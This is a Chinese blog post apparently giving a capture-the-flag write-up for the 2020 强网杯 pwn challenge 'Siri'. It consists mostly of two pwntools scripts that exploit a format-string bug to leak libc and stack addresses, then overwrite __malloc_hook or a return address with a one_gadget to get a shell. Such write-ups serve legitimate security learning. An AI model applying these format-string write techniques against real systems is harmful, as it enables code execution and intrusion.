强网杯-[强网先锋]-Siri

最新推荐文章于 2024-05-31 11:25:26 发布
最新推荐文章于 2024-05-31 11:25:26 发布
阅读量141 收藏
点赞数
分类专栏: CTF-PWN 文章标签: linux 开发语言 github
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55906008/article/details/133151888
版权

强网杯-[强网先锋]-Siri

不做解释,只提供wp,具体解释请看:[PWN] 强网杯2020siri 手撸格式化字符串_看海就会失去海的博客-CSDN博客

一、劫持__malloc_hook

from pwn import *
from LibcSearcher import *

file_path = "./chall/1"
local = 1
remote_path = "node4.buuoj.cn:29718"
elf = ELF("./chall/1")
libc = ELF("/usr/lib/x86_64-linux-gnu/libc.so.6")
# libc= ELF("./chall/libc.so.6")

################################  forbidden ####################################
if local != 1:
    p = remote(remote_path.split(":")[0],int(remote_path.split(":")[1]))
else:
    p = process(file_path)

sd      = lambda payload        : p.send(payload)
sdl     = lambda payload        : p.sendline(payload)
sda     = lambda data,payload   : p.sendafter(data,payload)
sdla    = lambda data,payload   : p.sendlineafter(data,payload)
it      = lambda                : p.interactive()
rcv     = lambda num            : p.recv(num)
rcv_all = lambda                : p.recv()
rcvu    = lambda data           : p.recvuntil(data)
lbc     = lambda str1,str2      : LibcSearcher(str1,str2)
lg      = lambda name,data      : p.success(name + "-> 0x%x" % data)



#采用b *<addr>  b *$rebase(<addr>)下断点
def debug(a=''):
    if local:
        gdb.attach(p,a)
        if a=='':
            gdb.attach()
            pause()
    else: pass
################################  forbidden ####################################

get_addr_64 = lambda: u64(rcvu(b"\x7f")[-6:].ljust(8,b"\x00"))


############################################################################
##check: arch
##check:local
##check: .so

def mysdl(payload):
    sdla(">>> ","Hey Siri!")
    sleep(0.2)
    sdla(">>> ",b"Remind me to "+payload)
    
if __name__ == "__main__":

    debug("b *$rebase(0x12b1)")
    context(os='linux', arch='amd64', log_level='debug')
    payload = b"%103$p"
    mysdl(payload)
    rcvu("you to ")
    libc_start_main_addr = int(str(rcv(14))[2:-1],16) -128
    # lg("libc_main_addr",libc_start_main_addr)
    print("libc_main_addr -> ",hex(libc_start_main_addr))
    libc_base = libc_start_main_addr - libc.symbols["__libc_start_main"]
    malloc_hook = libc_base + libc.symbols["__malloc_hook"]
    print("malloc_hook -> ",hex(malloc_hook))
    print("libc_base -> ",hex(libc_base))  #打印地址正确!
    onegadget = libc_base + 0xebcf5
    print("onegadget -> ",hex(onegadget))  #打印地址正确!
    
    for i in range(3):
        print("onegadget -> ",hex(onegadget>>(i*16)&0xffff))  #打印地址正确!
    #####开始覆盖!#########
    
    has_writed = 27 
    offset = 55
    payload = ""
    
    for i in range(3):
        tmp  = (onegadget >> (i*16)) & 0xffff
        tmp  = tmp
        if tmp > has_writed:
            payload = payload + "%{}c%{}$hn".format(tmp-has_writed,offset+i)
        else:
            payload = payload + "%{}c%{}$hn".format(0x10000-has_writed+tmp,offset+i)
        has_writed = tmp&0xffff
    
    payload = bytes(payload.encode('utf-8'))
    payload = payload.ljust(0x38-13,b"a")
    for i in range(3):
        payload = payload + p64(malloc_hook+i*2)

        
    mysdl(payload)
    sleep(0.2)
    crush = b"%9999c"
    mysdl(crush)
    
    it()

二、劫持返回地址

from pwn import *
from LibcSearcher import *

file_path = "./chall/1"
local = 1
remote_path = "node4.buuoj.cn:29718"
elf = ELF("./chall/1")
libc = ELF("/usr/lib/x86_64-linux-gnu/libc.so.6")
# libc= ELF("./chall/libc.so.6")

################################  forbidden ####################################
if local != 1:
    p = remote(remote_path.split(":")[0],int(remote_path.split(":")[1]))
else:
    p = process(file_path)

sd      = lambda payload        : p.send(payload)
sdl     = lambda payload        : p.sendline(payload)
sda     = lambda data,payload   : p.sendafter(data,payload)
sdla    = lambda data,payload   : p.sendlineafter(data,payload)
it      = lambda                : p.interactive()
rcv     = lambda num            : p.recv(num)
rcv_all = lambda                : p.recv()
rcvu    = lambda data           : p.recvuntil(data)
lbc     = lambda str1,str2      : LibcSearcher(str1,str2)
lg      = lambda name,data      : p.success(name + "-> 0x%x" % data)



#采用b *<addr>  b *$rebase(<addr>)下断点
def debug(a=''):
    if local:
        gdb.attach(p,a)
        if a=='':
            gdb.attach()
            pause()
    else: pass
################################  forbidden ####################################

get_addr_64 = lambda: u64(rcvu(b"\x7f")[-6:].ljust(8,b"\x00"))


############################################################################
##check: arch
##check:local
##check: .so

def mysdl(payload):
    sdla(">>> ","Hey Siri!")
    sleep(0.2)
    sdla(">>> ",b"Remind me to "+payload)
    
if __name__ == "__main__":

    debug("b *$rebase(0x12b1)")
    context(os='linux', arch='amd64', log_level='debug')
    payload = b"%103$p%7$p"
    mysdl(payload)
    rcvu("you to ")
    libc_start_main_addr = int(str(rcv(14))[2:-1],16) -128
    stack = int(str(rcv(14))[2:-1],16)-0x158
    print("stack -> ",hex(stack))
    
    # lg("libc_main_addr",libc_start_main_addr)
    print("libc_main_addr -> ",hex(libc_start_main_addr))
    libc_base = libc_start_main_addr - libc.symbols["__libc_start_main"]
    malloc_hook = libc_base + libc.symbols["__malloc_hook"]
    print("malloc_hook -> ",hex(malloc_hook))
    print("libc_base -> ",hex(libc_base))  #打印地址正确!
    onegadget = libc_base + 0xebcf5
    print("onegadget -> ",hex(onegadget))  #打印地址正确!
    
    for i in range(3):
        print("onegadget -> ",hex(onegadget>>(i*16)&0xffff))  #打印地址正确!
    #####开始覆盖!#########
    
    has_writed = 27 
    offset = 55
    payload = ""
    
    for i in range(3):
        tmp  = (onegadget >> (i*16)) & 0xffff
        tmp  = tmp
        if tmp > has_writed:
            payload = payload + "%{}c%{}$hn".format(tmp-has_writed,offset+i)
        else:
            payload = payload + "%{}c%{}$hn".format(0x10000-has_writed+tmp,offset+i)
        has_writed = tmp&0xffff
    
    payload = bytes(payload.encode('utf-8'))
    payload = payload.ljust(0x38-13,b"a")
    for i in range(3):
        payload = payload + p64(stack+i*2)

    
     
        
    mysdl(payload)
    sleep(0.2)
    # crush = b"%9999c"
    # mysdl(crush)
    
    it()

总结: one_gadget条件太苛刻了,但格式化字符串可以实现任意地址写,可以更改很多返回地址,mallochook、freehook的函数调用,可以尝试爆破

魔瞳。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
强网杯-upload1
08-08
强网杯强网先锋upload题,题目附件是data.pcapng文件直接打开(如果有wireshark软件)通过观察,发现有两个有用的数据包第一个是No. 2打开
强网杯 WriteUp By Nu1L
08-02
2022年第六届“强网杯”全国网络安全挑战赛
2020强网杯Siri记录
qq_39153421的博客
03-15 749
题目检查 checksec检查,保护全开。ida看下函数功能,发现sub_1212函数有格式化字符串漏洞: __int64 __fastcall sub_1212(const char *a1) { char *v2; // [rsp+18h] [rbp-128h] char s[280]; // [rsp+20h] [rbp-120h] BYREF unsigned __int64 v4; // [rsp+138h] [rbp-8h] v4 = __readfsqword(0x28u);
[PWN] 学习记录——栈
LDX的博客
09-26 49
星盟安全 PWN学习笔记
强网杯2021 pwn 赛题解析——babypwn
CoLin的pwn小屋
07-26 728
强网杯2021 pwn 赛题回顾——babypwn
强网杯部分pwn题writeup
Sakura给爷pwn全场
10-01 527
强网杯部分pwn题writeup: https://www.anquanke.com/post/id/215274#h3-2
强网杯-强网先锋辅助
、moddemod
01-04 1241
题目描述 flag=open("flag","rb").read() from Crypto.Util.number import getPrime, bytes_to_long import time p=getPrime(1024) q=getPrime(1024) e = 65537 n=p*q m=bytes_to_long(flag) c=pow(m,e,n) print c,e,n ...
2019第三届强网杯-强网先锋-ADwp
or1d1的博客
05-27 4974
周末参加了一下强网杯,emmm这些题目不是我等弟弟所能解答的。 鲲or鳗orGame题目wphttps://blog.csdn.net/or1d1/article/details/90599659 其他大佬的wp https://skysec.top/2019/05/25/2019-%E5%BC%BA%E7%BD%91%E6%9D%AFonline-Web-Writeup/#uploa...
2022强网杯CTF---强网先锋 ASR wp
3tefanie丶zhou的博客
07-31 1691
【有些不愿开口与人说的委屈,来自得不到身边人的回应,种种期许、憧憬、愿望之心声,在心中如擂鼓,响彻自己天地间。心外却哑然,永远寂静无声,这就像一个人把嗓子喊哑了,身边还是无人听见,这个人就会越来越不喜欢说话,一直沉默下去,直到变成一个哑巴。】
2018强网杯CTF-题目整理.zip
12-17
2018强网杯CTF___题目整理
2018强网杯CTF-题目整理-校本图片Readme.zip
12-18
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...
强网杯2022 pwn 赛题解析.docx
12-18
强网杯
CentOS 7基础操作05_Linux查看及切换目录
最新发布
IT_zhangsan
05-31 790
pwd命令用于显示用户当前所在的工作目录位置,工作目录是用户操作文件或其他子目录的默认位置起点。使用pwd命令可以不添加任何选项或参数。
Linux - 磁盘的分区和挂载
weixin_45735487的博客
05-27 747
逻辑分区只能在拓展分区上划分,编号5-15。拓展分区编号1-4,拓展分区不能格式化。rescue 恢复分区,对于误删的分区进行恢复,语法: rescue 起始 结束。rm 删除分区,后接要删除的分区编号。(L) 在主分区和拓展分区划分完之后,默认提示划分逻辑分区。n 进行磁盘分区,这里会默认MBR标签。(p) msdos下,会默认选择先划分主分区。
Linux】升级GCC(版本9.3),补充:binutils
yannan20190313的博客
05-27 797
Linux】升级GCC(版本9.3),补充:binutils
Linux echo命令(在终端输出文本)
Dontla的博客
05-22 881
echo是Linux和Unix系统中常用的一个命令行工具,主要用于在终端输出文本。该命令非常简单,但是它在脚本编程和日常系统管理中扮演着重要的角色。
Linux】中常见的重要指令(下)以及重要的几个热键
2401_84568462的博客
05-27 1188
find指令查找的文件不能当前路径下(可以这样理解:如果要查找当前路径下可以使用ls指令,就不麻烦find指令了),必须查找当前路径下的目录里的文件。1.能被打包压缩的一定是由多个文件组成的,打包压缩后将文件变为一个整体,在传递给其他用户时不容易缺失。.tar打包后缀 .gz压缩后缀 XXX.tar.gz ----->XXX.tgz。功能:在系统特定的路径下查找,及可以找到可执行程序,有可以找到手册,安装包和压缩包等。命令在目录结构中搜索文件,并执行指定的操作。功能:在指令路径下搜索指令文件。
Linux 使用unzip解压时报错End-of-central-directory signature not found
weixin_44162814的博客
05-31 240
应该是 unzip 设置了这个解压的文件大小限制了
强网杯-2022 yakagame
11-22
强网杯-2022 yakagame是一个国际性的网络安全竞赛,旨在提高参赛者在网络安全领域的技术能力和解决问题的能力。比赛的目标是通过攻防对抗的方式,测试参赛者在网络攻防、逆向工程、密码学等方面的知识与技能。 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值